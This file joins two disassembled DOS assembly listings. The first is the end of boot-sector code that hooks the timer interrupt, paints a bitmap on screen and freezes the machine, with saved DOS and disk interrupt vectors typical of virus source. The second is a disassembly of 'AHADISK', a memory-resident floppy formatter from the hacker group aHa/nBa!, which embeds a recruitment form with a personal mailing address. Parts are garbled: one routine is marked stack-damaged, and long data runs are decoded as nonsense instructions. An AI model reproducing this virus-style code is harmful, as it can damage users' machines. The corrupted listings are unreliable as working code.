		mov	dx,0B000h
		mov	ah,0Fh
		int	10h			; Video display   ah=functn 0Fh
						;  get state, al=mode, bh=page
		cmp	al,7
		je	loc_86			; Jump if equal
		mov	dx,0B800h
loc_86:
		mov	es,dx
		cld				; Clear direction
		xor	di,di			; Zero register
		mov	cx,7D0h
		mov	ax,720h
		rep	stosw			; Rep when cx >0 Store ax to es:[di]
		mov	si,data2-boot+7C00h	; (CS:7C0E=0)
		mov	bx,2AEh
loc_87:
		mov	bp,5
		mov	di,bx
loc_88:
		lodsb				; String [si] to al
		mov	dh,al
		mov	cx,8

locloop_89:
		mov	ax,720h
		shl	dx,1			; Shift w/zeros fill
		jnc	loc_90			; Jump if carry=0
		mov	al,0DBh
loc_90:
		stosw				; Store ax to es:[di]
		loop	locloop_89		; Loop if cx > 0

		dec	bp
		jnz	loc_88			; Jump if not zero
		add	bx,0A0h
		cmp	si,loc_85-boot+7C00h
		jb	loc_87			; Jump if below
		mov	ah,1
		int	10h			; Video display   ah=functn 01h
						;  set cursor mode in cx
		mov	al,8
		mov	dx,loc_911-boot+7C00h
		call	sub_27			; Set INT 08 vector
		mov	ax,7FEh
		out	21h,al			; port 21h, 8259-1 int comands
						;  al = 0FEh, IRQ0 (timer) only
		sti				; Enable interrupts
		xor	bx,bx			; Zero register
		mov	cx,1
loc_91: 	jmp	short loc_91		; SLEEP!!!
loc_911:	dec	cx			; INT 08 handler
		jnz	loc_92			; Jump if not zero
		xor	di,di			; Zero register
		inc	bx
		call	sub_25			; (0F67)
		call	sub_25			; (0F67)
		mov	cl,4
loc_92:
		mov	al,20h			; ' '
		out	20h,al			; port 20h, 8259-1 int command
						;  al = 20h, end of interrupt
		iret				; Interrupt return

;
;			       SUBROUTINE
;

sub_25		proc	near
		mov	cx,28h

locloop_93:
		call	sub_26			; (0F93)
		stosw				; Store ax to es:[di]
		stosw				; Store ax to es:[di]
		loop	locloop_93		; Loop if cx > 0

add1:		add	di,9Eh	    ; sub di,9Eh
		mov	cx,17h

locloop_94:
		call	sub_26			; (0F93)
		stosw				; Store ax to es:[di]
add2:		add	di,9Eh	    ; sub di,9Eh
		loop	locloop_94		; Loop if cx > 0

setd:		std				; Set direction flag
_setd		equ	setd - boot + 7c00h
		xor	byte ptr ds:[_setd],1	; (CS:7CE7=0)
_add1		equ	add1 - boot + 7c01h
		xor	byte ptr ds:[_add1],28h ; (CS:7CD7=0) '('
_add2		equ	add2 - boot + 7c01h
		xor	byte ptr ds:[_add2],28h ; (CS:7CE2=0) '('
		retn
sub_25		endp


;
;			       SUBROUTINE
;

sub_26		proc	near
		and	bx,3
_data1		equ	data1 - boot + 7c00h
		mov	al,byte ptr ds:[_data1+bx]	 ; (CS:7C0A=0)
		inc	bx
		retn
sub_26		endp


;
;			       SUBROUTINE
;

sub_27		proc	near
		push	es
		push	bx
		xor	bx,bx			; Zero register
		mov	es,bx
		mov	bl,al
		shl	bx,1			; Shift w/zeros fill
		shl	bx,1			; Shift w/zeros fill
		mov	es:[bx],dx
		mov	es:[bx+2],ds
		pop	bx
		pop	es
		retn
sub_27		endp


;
;		      SUBROUTINE - *** DAMAGED BY STACK ***
;

sub_28		proc	near
		call	sub_13			; (0CC6)
		mov	dl,1
		add	[bp+si-4F2h],bl
		pop	es
		jo	$+2			; Jump if overflow=1
		xor	cx,word ptr ds:[32Eh]	; (0000:032E=0)
		push	di
		sbb	[bp+di],al
		add	byte ptr ds:[0],ah	; (0000:0000=5Bh)
		add	[bx+di],ah
		add	[bx+si+12h],dl
		sbb	dx,[bx]
		loopnz	$+11h			; Loop if zf=0, cx>0
		jnp	$+23h			; Jump if not parity
		db	0C1h, 02h, 31h, 41h, 7Ah, 16h
		db	 01h, 1Fh, 9Ah, 0Eh,0FBh, 07h
		db	 70h, 00h, 33h, 0Eh, 2Eh, 03h
		db	 57h, 18h, 57h, 1Fh,0A9h, 80h
		db	 00h, 00h, 57h, 1Fh
sub_28		endp

		org	1200h

data_38 	dw	?
data_40 	dw	?
data_41 	dw	?, ?
data_42 	dw	?
data_43 	dw	?
data_44 	dw	?
data_45 	dw	?
data_46 	dw	?, ?
data_48 	dw	?
data_49 	dw	?
		db	12 dup (?)
prm_blck_adr	dw	?, ?
data_52 	db	?
data_53 	dw	?
data_54 	dw	?
old_INT 	dd	?
old_INT_1	dd	?
ptr_INT_21	dd	?
old_INT_13	dd	?
old_INT_24	dd	?
data_65 	dd	?
old_DS		dw	?
data_68 	dw	?
data_69 	dw	?
data_70 	db	?
data_71 	dw	?
data_72 	dw	?
data_73 	db	?
data_74 	db	?
data_75 	db	50h dup (?)
data_76 	db	?
data_77 	dw	?
data_78 	dw	?
data_79 	dw	?
data_80 	dw	?
data_81 	dw	?
data_82 	dw	?
data_83 	dw	?
data_84 	dw	?
data_85 	dw	?
data_86 	db	0Eh dup (?)
data_87 	dw	?
data_88 	dd	?
		db	?
data_89 	db	10h dup (?)
data_90 	db	?
data_91 	dw	?
data_92 	dw	?
data_93 	dw	?
data_94 	db	?
data_95 	db	?
old_AX		dw	?
data_97 	db	?
data_98 	dw	?
data_99 	dw	?
data_100	dw	?
data_101	dw	?
dos_ver 	db	?
data_103	db	?
data_104	db	?
exec_block	db	0Eh dup (?)
data_106	dw	?
data_107	dw	?
entry_point	dd	?
file_name	db	50h dup (?)
data_111	dw	?
data_112	dw	?
data_113	dw	?
data_114	dw	?

seg_a		ends

		end


..............................................................................

PAGE  59,132

;
;								         
;			        AHADISK				         
;								         
;      Created:   29-Feb-92					         
;      Passes:    5	       Analysis Options on: none	         
;								         
;

data_1e		equ	0
data_2e		equ	1
data_3e		equ	3
data_4e		equ	94h
keybd_flags_1_	equ	417h
dsk_recal_stat_	equ	43Eh
dsk_motor_stat_	equ	43Fh
dsk_motor_tmr_	equ	440h
video_mode_	equ	449h
video_port_	equ	463h
timer_low_	equ	46Ch
hdsk0_media_st_	equ	490h
data_16e	equ	1000h			;*
data_17e	equ	0			;*
data_18e	equ	3			;*
data_234e	equ	7C3Eh			;*

;--------------------------------------------------------------	seg_a  ----

seg_a		segment	byte public
		assume cs:seg_a , ds:seg_a


;
;
;			Program Entry Point
;
;


ahadisk		proc	far

start:
		jmp	loc_262
data_24		db	0, 0
data_25		dw	0
data_26		dw	0
data_27		dw	0
data_28		db	0
data_29		db	0
data_30		db	0
		db	0
data_31		dw	1
data_32		db	19h
		db	0
data_33		db	' ', 0
		db	27h, 0
		db	'.', 0
		db	' 360 K', 0
		db	' 1.2 M', 0
		db	' 720 K', 0
		db	'1.44 M', 0
data_37		db	0FFh
		db	 11h,0FFh
data_38		db	1Dh
		db	0FFh, 11h,0FFh, 23h
data_39		db	1
		db	0, 2, 0
data_40		db	23h
		db	 00h, 3Bh, 00h, 23h, 00h, 47h
		db	 00h
data_41		db	2
		db	1, 2
data_42		db	1
data_43		db	0DFh
		db	0DFh,0DFh,0AFh
data_44		db	9
		db	 0Fh, 09h, 12h
data_45		db	2Ah
		db	 1Bh, 2Ah, 1Ah
data_46		db	50h
		db	 54h, 50h, 6Ch
data_47		db	0FDh
		db	0F9h,0F9h,0F0h
data_48		db	70h
		db	0
		db	0E0h, 00h

locloop_2:
		jo	loc_3			; Jump if overflow=1
loc_3:
		loopnz	$+2			; Loop if zf=0, cx>0

		rol	byte ptr [bp+si],1	; Rotate
		db	 60h, 09h,0A0h, 05h, 40h, 0Bh
data_50		db	2
		db	0, 7, 0, 3, 0, 9
		db	0
data_51		db	62h
		db	 01h, 43h, 09h,0C9h, 02h, 1Fh
		db	 0Bh
data_52		db	6
		db	1, 4, 3
data_53		db	0
data_54		dw	0
data_55		db	0
data_56		db	0
data_57		db	2Ah
data_58		db	50h
data_59		db	0
data_60		db	0, 0
data_61		dw	0
data_62		db	0
data_63		db	0
data_64		db	0
data_65		db	0
data_66		db	0
data_67		dw	0
data_68		dw	0
data_69		db	0
data_70		db	0
data_71		db	0
data_72		db	0
data_73		db	0
data_74		db	0
data_75		db	0
data_76		db	0
data_77		db	0
data_78		db	0
data_79		db	0
data_80		db	0
data_81		dw	130Dh
data_82		dw	0
data_84		dw	0
data_85		dw	0
data_86		dw	0
data_87		dw	0
data_88		dw	0
data_89		dw	0
data_90		dw	0
data_91		dw	0
data_92		dw	0
data_93		dw	0
data_94		db	0
data_95		db	0
data_96		db	0Bh
data_97		db	0
data_98		db	0, 0
data_99		db	0
data_100	dw	0
data_101	db	0
data_102	db	0
data_103	db	0
data_104	db	0
data_105	dw	0
data_106	dw	0
data_107	db	0
data_108	db	0
data_109	db	0
data_110	db	6
data_111	db	0A0h
data_112	db	0
data_113	db	0
		db	11 dup (0)
data_115	db	0
		db	9 dup (0)

ahadisk		endp

;
;			       SUBROUTINE
;

sub_2		proc	near
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+di],al
		add	[bx],cl
		add	[bx+di],al
		add	[bp+si],cl
		add	[si+0],ah
;*		call	sub_5			;*
		db	0E8h, 03h, 10h
		daa				; Decimal adjust
		mov	al,byte ptr ds:[4086h]
		inc	dx
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		ja	$+7			; Jump if above
		add	[bx+si],al
		add	[bx+si],al
		pop	dx
		xor	ax,355Ah
		pop	dx
		xor	ax,577h
		add	[bx+si],al

; External Entry into Subroutine 

sub_3:
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		pop	dx
		xor	ax,0
		add	[bx+si],al
		add	[bx+si],al
		pop	dx
		xor	ax,0
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		pop	dx
		xor	ax,577h
		pop	dx
		xor	ax,0
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	bh,dh
;*		pop	cs			; Dangerous 8088 only
		db	0Fh
;*		jo	loc_4			;*Jump if overflow=1
		db	 70h,0FFh
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[bx+si],al
		add	[di+6Eh],al
		jz	loc_5			; Jump if zero
		jc	$+22h			; Jump if carry Set
		inc	sp
		jc	$+6Bh			; Jump if carry Set
		jbe	loc_6			; Jump if below or =
		and	[si+6Fh],dl
		and	[bp+si+65h],al
		and	[bp+6Fh],al
		jc	$+6Fh			; Jump if carry Set
		db	 61h, 74h, 20h, 3Fh, 20h, 5Bh
		db	'A'
		db	 5Dh, 00h
		db	'Enter Drive Type ? (0 - 360K, 1 '
		db	'- 1.2M)  [0]'
		db	0
		db	'Enter Drive Type ? (0 - 720K,'
loc_5:
		and	[bx+di],dh
		and	[di],ch
		and	[bx+di],dh
loc_6:
		db	'.44M) [0]'
		db	0
		db	'Number Of Diskette To Be Format '
		db	'(1-11) ['
data_182	dw	3131h
		db	 5Dh, 20h, 3Fh, 20h, 00h
		db	'Insert New Diskette Into Drive '
data_183	db	41h
		db	0
		db	'Press ENTER To Start Format Or E'
		db	'SC To Abort'
		db	0
		db	'Can', 27h, 't Release From Memor'
		db	'y, Interrupt Vector Address Been'
		db	' Changed'
		db	0
		db	'Press Any Key To Return To Main '
		db	'Menu'
		db	0
		db	'No Format Report !'
		db	 00h, 00h, 00h, 00h, 00h, 2Dh
		db	 00h, 00h, 00h, 00h, 00h
		db	 43h, 70h
data_184	db	'HpApNpGpEpEpRpRpOpRp!pFpIpNpIpSp'
		db	'Hp p p', 0
		db	'p', 0
		db	'p p pDisk Not Ready !', 0
		db	'Disk Write Protected !', 0
		db	'Seek Error !', 0
		db	'Abort or Retry ?', 0
		db	'Track 0 Bad, Diskette Unusable !'
		db	0
		db	'Program Interrupted !', 0
		db	'Ready Printer, Press ENTER When '
		db	'Ready !', 0
		db	'Printing ....', 0
		db	'I/O Error !', 0
		db	'Printer Not Ready !', 0
		db	0C9h, 01h, 4Eh,0CDh,0BBh,0BAh
		db	 01h, 4Eh, 20h,0BAh,0BAh, 01h
		db	 13h, 20h,0ADh
		db	'aHa/nBa!Mem Resident Format '
		db	1, 3
		db	' Version 6.9'
		db	 01h, 10h, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0CCh, 01h
		db	 4Eh,0CDh,0B9h,0BAh, 01h, 4Eh
		db	 20h
		db	0BAh,0BAh, 01h, 4Eh, 20h,0BAh
		db	0BAh, 01h, 4Eh, 20h,0BAh,0BAh
		db	 01h, 4Eh, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0BAh, 01h, 4Eh
		db	 20h,0BAh,0BAh, 01h, 4Eh, 20h
		db	0BAh,0BAh, 01h, 4Eh, 20h,0BAh
		db	0BAh, 01h, 4Eh, 20h,0BAh,0BAh
		db	 01h, 4Eh, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0BAh, 01h, 4Eh
		db	 20h,0BAh,0BAh, 01h, 4Eh, 20h
		db	0BAh
		db	0BAh, 01h, 4Eh, 20h,0BAh,0BAh
		db	 01h, 4Eh, 20h,0BAh,0BAh, 01h
		db	4Eh
		db	 20h,0BAh,0BAh, 01h, 4Eh, 20h
		db	0BAh,0BAh, 01h, 4Eh, 20h,0BAh
		db	0BAh, 01h
		db	 4Eh, 20h
		db	0BAh,0C8h, 01h, 4Eh,0CDh,0BCh
		db	 01h, 87h,0D0h, 1Fh,0C9h, 01h
		db	 4Eh,0CDh,0BBh,0BAh, 01h, 4Eh
		db	 20h,0BAh,0BAh, 01h, 13h, 20h
		db	0ADh
		db	'aHa/nBa!Mem Resident Format '
		db	1, 3
		db	' Version 6.9'
		db	 01h, 10h, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0CCh, 01h
		db	 4Eh,0CDh,0B9h,0BAh, 01h, 1Ch
		db	 20h
		db	0DAh, 01h, 15h,0C4h,0BFh, 01h
		db	 1Bh, 20h,0BAh,0BAh, 01h, 1Ch
		db	 20h,0B3h
		db	' Print Out '
		db	0ADh
		db	'aHa/nBa! '
		db	0B3h, 01h, 1Bh, 20h,0BAh,0BAh
		db	 01h, 1Ch, 20h,0C0h, 01h, 15h
		db	0C4h,0D9h, 01h, 1Bh, 20h,0BAh
		db	0BAh, 01h, 1Ch, 20h,0DAh, 01h
		db	 15h,0C4h
		db	0BFh, 01h, 1Bh, 20h,0BAh,0BAh
		db	 01h, 1Ch, 20h,0B3h, 01h, 04h
		db	' Start format'
		db	 01h, 05h, 20h,0B3h, 01h, 1Bh
		db	 20h,0BAh,0BAh, 01h, 1Ch, 20h
		db	0C0h, 01h, 15h,0C4h,0D9h, 01h
		db	 1Bh, 20h,0BAh,0BAh, 01h, 1Ch
		db	 20h,0DAh, 01h, 15h,0C4h,0BFh
		db	 01h, 1Bh, 20h,0BAh,0BAh, 01h
		db	 1Ch, 20h,0B3h, 01h, 04h
		db	' Format report'
		db	 01h, 04h, 20h,0B3h, 01h, 1Bh
		db	 20h,0BAh,0BAh, 01h, 1Ch, 20h
		db	0C0h, 01h, 15h,0C4h,0D9h, 01h
		db	 1Bh, 20h,0BAh,0BAh, 01h, 1Ch
		db	 20h,0DAh, 01h, 15h,0C4h,0BFh
		db	 01h, 1Bh, 20h,0BAh,0BAh, 01h
		db	 1Ch, 20h,0B3h
		db	'  Track display o'
data_187	dw	206Eh
		db	 20h, 20h,0B3h, 01h, 1Bh, 20h
		db	0BAh,0BAh, 01h, 1Ch, 20h,0C0h
		db	 01h, 15h,0C4h,0D9h, 01h, 1Bh
		db	 20h,0BAh,0BAh, 01h, 1Ch, 20h
		db	0DAh, 01h, 15h,0C4h,0BFh, 01h
		db	 1Bh, 20h,0BAh,0BAh, 01h, 1Ch
		db	 20h,0B3h
		db	' Release from memory '
		db	0B3h, 01h, 1Bh, 20h,0BAh,0BAh
		db	 01h, 1Ch, 20h,0C0h, 01h, 15h
		db	0C4h,0D9h, 01h, 1Bh, 20h,0BAh
		db	0BAh, 01h, 1Ch, 20h,0DAh, 01h
		db	 15h,0C4h,0BFh, 01h, 1Bh, 20h
		db	0BAh,0BAh, 01h, 1Ch, 20h,0B3h
		db	 01h, 09h, 20h, 45h, 78h, 69h
		db	 74h, 01h, 08h, 20h,0B3h, 01h
		db	 1Bh, 20h,0BAh,0BAh, 01h, 1Ch
		db	 20h,0C0h, 01h, 15h,0C4h,0D9h
		db	 01h, 1Bh, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0C8h, 01h, 4Eh
		db	0CDh,0BCh, 01h, 87h,0D0h, 1Fh
		db	0C9h, 01h, 4Eh,0CDh,0BBh,0BAh
		db	 01h, 4Eh, 20h,0BAh,0BAh, 01h
		db	 13h, 20h,0ADh
		db	'aHa/nBa!Mem Resident Format '
		db	1, 3
		db	' Version 6.9'
		db	 01h, 10h, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0CCh, 01h
		db	4Eh
		db	0CDh,0B9h,0BAh, 01h, 4Eh, 20h
		db	0BAh,0BAh, 01h, 4Eh, 20h,0BAh
		db	0BAh, 01h, 4Eh, 20h,0BAh,0BAh
		db	 01h, 4Eh, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0BAh, 01h, 4Eh
		db	 20h,0BAh,0BAh, 01h, 4Eh, 20h
		db	0BAh,0BAh, 01h, 4Eh, 20h,0BAh
		db	0BAh, 01h, 4Eh, 20h,0BAh,0BAh
		db	 01h, 4Eh, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0BAh, 01h, 4Eh
		db	 20h,0BAh,0BAh, 01h, 4Eh, 20h
		db	0BAh
		db	0BAh, 01h, 4Eh, 20h,0BAh,0BAh
		db	 01h, 4Eh, 20h,0BAh,0CCh, 01h
		db	 17h
		db	0CDh,0D1h, 01h, 0Fh,0CDh,0D1h
		db	 01h, 10h,0CDh,0D1h, 01h, 15h
		db	0CDh,0B9h,0BAh, 01h
		db	3
		db	' Drive To Be Format  '
		db	0B3h, 01h, 03h
		db	' Drive Type  '
		db	0B3h
		db	'  Diskette No.  '
		db	0B3h
		db	'  Total Diskette(s)  '
		db	0BAh,0C7h, 01h, 17h,0C4h,0C5h
		db	 01h, 0Fh,0C4h,0C5h, 01h, 10h
		db	0C4h,0C5h, 01h, 15h,0C4h,0B6h
		db	0BAh, 01h, 0Bh
		db	20h
data_188	db	41h
		db	 01h, 0Bh, 20h,0B3h, 01h, 05h
		db	 20h
data_189	db	31h
		db	 2Eh, 34h, 34h, 20h, 4Dh, 01h
		db	 04h, 20h,0B3h, 01h, 06h
		db	20h
data_190	dw	3120h
		db	 01h, 08h, 20h,0B3h, 01h
		db	 09h, 20h
data_191	dw	3131h
		db	1
		db	 0Ah, 20h,0BAh,0C8h, 01h
		db	 17h,0CDh,0CFh, 01h, 0Fh,0CDh
		db	0CFh, 01h, 10h,0CDh,0CFh, 01h
		db	 15h,0CDh,0BCh, 01h, 87h,0D0h
		db	 1Fh,0C9h, 01h, 4Eh,0CDh,0BBh
		db	0BAh, 01h, 4Eh, 20h,0BAh,0BAh
		db	 01h, 13h
		db	' Background Diskette Formatter S'
		db	'tatus Report'
		db	 01h, 10h, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0BAh, 01h, 4Eh
		db	 20h,0BAh,0CCh, 01h, 0Ch,0CDh
		db	0D1h
		db	 01h, 15h,0CDh,0D1h, 01h, 11h
		db	0CDh
		db	0D1h, 01h, 19h,0CDh,0B9h,0BAh
		db	'  Diskette  '
		db	0B3h, 01h, 07h, 20h, 56h, 6Fh
		db	 6Ch, 75h, 6Dh, 65h, 01h, 08h
		db	 20h,0B3h, 01h, 05h, 20h, 4Eh
		db	 6Fh, 2Eh, 20h, 4Fh, 66h, 01h
		db	 06h, 20h,0B3h, 01h, 04h
		db	' Total Disk Space'
		db	 01h, 05h, 20h,0BAh,0BAh, 01h
		db	 05h, 20h, 4Eh, 6Fh, 2Eh, 01h
		db	 04h, 20h,0B3h, 01h, 04h
		db	' Serial Number'
		db	 01h, 04h, 20h,0B3h
		db	'  Bad Cluster(s) '
		db	0B3h, 01h
		db	8, ' In Bytes'
		db	 01h, 09h, 20h,0BAh,0C7h, 01h
		db	 0Ch,0C4h,0C5h, 01h, 15h,0C4h
		db	0C5h, 01h, 11h,0C4h,0C5h, 01h
		db	 19h,0C4h,0B6h
		db	0BAh, 01h, 0Ch, 20h
		db	0B3h, 01h, 15h
		db	 20h,0B3h, 01h, 11h, 20h,0B3h
		db	 01h, 19h, 20h,0BAh,0BAh, 01h
		db	 0Ch, 20h,0B3h, 01h, 15h, 20h
		db	0B3h, 01h, 11h, 20h,0B3h, 01h
		db	 19h, 20h,0BAh,0BAh, 01h, 0Ch
		db	 20h,0B3h, 01h, 15h, 20h,0B3h
		db	 01h, 11h, 20h,0B3h, 01h, 19h
		db	 20h,0BAh,0BAh, 01h, 0Ch, 20h
		db	0B3h, 01h, 15h, 20h,0B3h, 01h
		db	 11h
		db	20h
		db	0B3h, 01h, 19h, 20h,0BAh,0BAh
		db	 01h, 0Ch, 20h,0B3h, 01h, 15h
		db	 20h,0B3h, 01h, 11h, 20h,0B3h
		db	 01h, 19h, 20h,0BAh,0BAh, 01h
		db	 0Ch, 20h,0B3h, 01h, 15h, 20h
		db	0B3h, 01h, 11h, 20h,0B3h, 01h
		db	 19h, 20h,0BAh,0BAh, 01h, 0Ch
		db	 20h,0B3h, 01h, 15h, 20h,0B3h
		db	 01h, 11h, 20h,0B3h, 01h, 19h
		db	 20h,0BAh,0BAh, 01h, 0Ch, 20h
		db	0B3h, 01h, 15h, 20h,0B3h, 01h
		db	 11h, 20h,0B3h, 01h, 19h, 20h
		db	0BAh,0BAh, 01h, 0Ch, 20h,0B3h
		db	 01h, 15h, 20h,0B3h, 01h, 11h
		db	 20h,0B3h, 01h, 19h, 20h,0BAh
		db	0BAh, 01h, 0Ch, 20h,0B3h, 01h
		db	 15h, 20h,0B3h, 01h, 11h, 20h
		db	0B3h, 01h, 19h, 20h,0BAh,0BAh
		db	 01h, 0Ch, 20h,0B3h, 01h, 15h
		db	 20h,0B3h, 01h, 11h, 20h,0B3h
		db	 01h, 19h, 20h,0BAh,0CCh, 01h
		db	 0Ch,0CDh,0CFh, 01h, 15h,0CDh
		db	0CFh, 01h, 11h,0CDh,0CFh, 01h
		db	 19h,0CDh,0B9h,0BAh, 01h, 4Eh
		db	 20h,0BAh,0BAh, 01h, 15h
		db	 20h, 50h
		db	'ress Any Key To Return To Main M'
		db	'enu'
		db	 01h, 15h, 20h,0BAh,0BAh, 01h
		db	 4Eh, 20h,0BAh,0C8h, 01h, 4Eh
		db	0CDh,0BCh, 01h, 87h,0D0h, 1Fh
		db	 0Dh, 0Ah, 0Dh, 0Ah, 20h
		db	9 dup (20h)
		db	0ADh
		db	'aHa/nBa! Application Form!      '
		db	'                          ', 0Dh
		db	0Ah, 'What file is this?', 0Dh, 0Ah
		db	'                      Where Did '
		db	'you get it from?', 0Dh, 0Ah, '  '
		db	'                  Handle:', 0Dh, 0Ah
		db	'       Phone #:', 0Dh, 0Ah, '   '
		db	'   ', 0Dh, 0Ah, '               '
		db	'               List 3 boards whe'
		db	're you could be reached at:    ', 0Dh
		db	0Ah, 0Dh, 0Ah, '                 '
		db	'                           Can y'
		db	'ou HaCK?', 0Dh, 0Ah, '          '
		db	'                       List a fe'
		db	'w thigs you', 27h, 've hacked:', 0Dh
		db	0Ah, 0Dh, 0Ah, '                 '
		db	'            Ok! Send MoneY, pft,'
		db	' and this letter to:', 0Dh, 0Ah, ' '
		db	'                     Psycho', 0Dh
		db	0Ah, '        1340 W Irving', 0Dh
		db	0Ah, ' #229', 0Dh, 0Ah, '        '
		db	'  Chicago, IL', 0Dh, 0Ah, '   60'
		db	'613', 0Dh, 0Ah, '               '
		db	'                          Ok! No'
		db	'w, write about yourself:        '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'                                '
		db	'        ', 0Ch, 0
		db	'.'
		db	 80h, 3Eh, 2Dh, 02h, 00h, 74h
		db	 08h, 2Eh,0FEh, 0Eh, 2Dh, 02h
		db	0EBh, 09h, 90h
		db	 2Eh,0F6h, 06h, 2Eh, 02h, 80h
		db	 75h, 05h
loc_32:
		jmp	dword ptr cs:[195h]
loc_33:
		mov	word ptr cs:[1EAh],ax
		mov	al,0Bh
		out	20h,al			; port 20h, 8259-1 int command
		jmp	short $+2		; delay for I/O
		in	al,20h			; port 20h, 8259-1 int IRR/ISR
		and	al,0FEh
		mov	ax,word ptr cs:[1EAh]
		jz	loc_34			; Jump if zero
		jmp	short loc_32
loc_34:
		mov	word ptr cs:[1FCh],ax
		mov	word ptr cs:[1FEh],bx
		mov	word ptr cs:[208h],sp
		mov	word ptr cs:[20Eh],ss
		mov	word ptr cs:[20Ch],ds
		mov	word ptr cs:[210h],es
		mov	word ptr cs:[20Ah],bp
		mov	word ptr cs:[204h],si
		mov	word ptr cs:[206h],di
		mov	word ptr cs:[200h],cx
		mov	word ptr cs:[202h],dx
		mov	ds,word ptr cs:[1E2h]
		mov	ss,word ptr ds:[1DAh]
		mov	sp,word ptr ds:[1DCh]
		mov	es,word ptr ds:[1E4h]
		mov	bp,word ptr ds:[1E0h]
		mov	si,word ptr ds:[1D8h]
		mov	di,word ptr ds:[1DEh]
		mov	ax,word ptr ds:[1D0h]
		mov	bx,word ptr ds:[1D2h]
		mov	cx,word ptr ds:[1D4h]
		mov	dx,word ptr ds:[1D6h]
		jmp	dword ptr cs:[195h]
		mov	word ptr cs:[1F8h],ds
		mov	word ptr cs:[1F6h],ax
		mov	word ptr cs:[1FAh],bx
		mov	ds,cs:data_25
		mov	bx,keybd_flags_1_
		mov	ah,[bx]
		and	ah,0Fh
		cmp	ah,0Bh
		jne	loc_36			; Jump if not equal
		test	byte ptr cs:[22Eh],0C0h
		jz	loc_35			; Jump if zero
		test	byte ptr cs:[22Eh],40h	; '@'
		jz	loc_36			; Jump if zero
		or	byte ptr cs:[22Eh],20h	; ' '
		jmp	short loc_36
		db	90h
loc_35:
		or	byte ptr cs:[22Eh],80h
loc_36:
		mov	ax,word ptr cs:[1F6h]
		mov	ds,word ptr cs:[1F8h]
		mov	bx,word ptr cs:[1FAh]
		jmp	dword ptr cs:[199h]
		db	 2Eh, 80h, 3Eh, 2Fh, 02h, 00h
		db	 74h, 0Dh, 2Eh,0C6h, 06h, 2Fh
		db	 02h, 00h, 50h,0B0h, 66h,0E6h
		db	 20h, 58h,0CFh
loc_37:
		jmp	dword ptr cs:[19Dh]
		test	dl,80h
		jnz	loc_38			; Jump if not zero
		test	byte ptr cs:[22Eh],40h	; '@'
		jz	loc_38			; Jump if zero
		mov	word ptr cs:[1EAh],ax
		pop	ax
		pop	ax
		pop	ax
		or	ax,1
		push	ax
		sub	sp,4
		mov	ax,word ptr cs:[1EAh]
